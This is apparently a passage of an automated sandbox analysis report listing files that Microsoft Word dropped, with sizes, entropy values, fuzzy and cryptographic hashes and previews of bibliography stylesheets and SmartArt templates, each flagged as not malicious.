                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .s.i.s.t.0.2...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):250983
                                    Entropy (8bit):5.057714239438731
                                    Encrypted:false
                                    SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                    MD5:F883B260A8D67082EA895C14BF56DD56
                                    SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                    SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                    SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):288
                                    Entropy (8bit):3.523917709458511
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
                                    MD5:4A9A2E8DB82C90608C96008A5B6160EF
                                    SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
                                    SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
                                    SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):296658
                                    Entropy (8bit):5.000002997029767
                                    Encrypted:false
                                    SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                    MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                    SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                    SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                    SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):290
                                    Entropy (8bit):3.5161159456784024
                                    Encrypted:false
                                    SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
                                    MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                                    SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                                    SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                                    SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):344303
                                    Entropy (8bit):5.023195898304535
                                    Encrypted:false
                                    SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                    MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                    SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                    SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                    SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):278
                                    Entropy (8bit):3.5280239200222887
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
                                    MD5:877A8A960B2140E3A0A2752550959DB9
                                    SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                                    SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                                    SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):268317
                                    Entropy (8bit):5.05419861997223
                                    Encrypted:false
                                    SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                    MD5:51D32EE5BC7AB811041F799652D26E04
                                    SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                    SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                    SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):260
                                    Entropy (8bit):3.4895685222798054
                                    Encrypted:false
                                    SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
                                    MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
                                    SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
                                    SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
                                    SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.r.y.i.n.g.W.i.d.t.h.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):3075
                                    Entropy (8bit):7.716021191059687
                                    Encrypted:false
                                    SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                    MD5:67766FF48AF205B771B53AA2FA82B4F4
                                    SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                    SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                    SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                    Malicious:false
                                    Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):333258
                                    Entropy (8bit):4.654450340871081
                                    Encrypted:false
                                    SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                    MD5:5632C4A81D2193986ACD29EADF1A2177
                                    SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                    SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                    SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):328
                                    Entropy (8bit):3.541819892045459
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
                                    MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
                                    SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
                                    SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
                                    SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):332
                                    Entropy (8bit):3.547857457374301
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
                                    MD5:4EC6724CBBA516CF202A6BD17226D02C
                                    SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
                                    SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
                                    SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):284415
                                    Entropy (8bit):5.00549404077789
                                    Encrypted:false
                                    SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                    MD5:33A829B4893044E1851725F4DAF20271
                                    SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                    SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                    SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):254
                                    Entropy (8bit):3.4845992218379616
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
                                    MD5:E8B30D1070779CC14FBE93C8F5CF65BE
                                    SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
                                    SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
                                    SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):6024
                                    Entropy (8bit):7.886254023824049
                                    Encrypted:false
                                    SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                    MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                    SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                    SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                    SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):260
                                    Entropy (8bit):3.494357416502254
                                    Encrypted:false
                                    SSDEEP:6:fxnxUX0XPE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPGHmD0+dAH/luWvv
                                    MD5:6F8FE7B05855C203F6DEC5C31885DD08
                                    SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
                                    SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
                                    SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):6193
                                    Entropy (8bit):7.855499268199703
                                    Encrypted:false
                                    SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                    MD5:031C246FFE0E2B623BBBD231E414E0D2
                                    SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                    SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                    SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):258
                                    Entropy (8bit):3.4692172273306268
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
                                    MD5:C1B36A0547FB75445957A619201143AC
                                    SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
                                    SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
                                    SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .p.i.c.t.u.r.e.o.r.g.c.h.a.r.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):7370
                                    Entropy (8bit):7.9204386289679745
                                    Encrypted:false
                                    SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                    MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                    SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                    SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                    SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):314
                                    Entropy (8bit):3.5230842510951934
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXJuJaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyZuUw9eNGHmD0wbnKYZAH/lMZqiv
                                    MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                                    SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                                    SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                                    SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.e.e.e.2.0.0.6.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):294178
                                    Entropy (8bit):4.977758311135714
                                    Encrypted:false
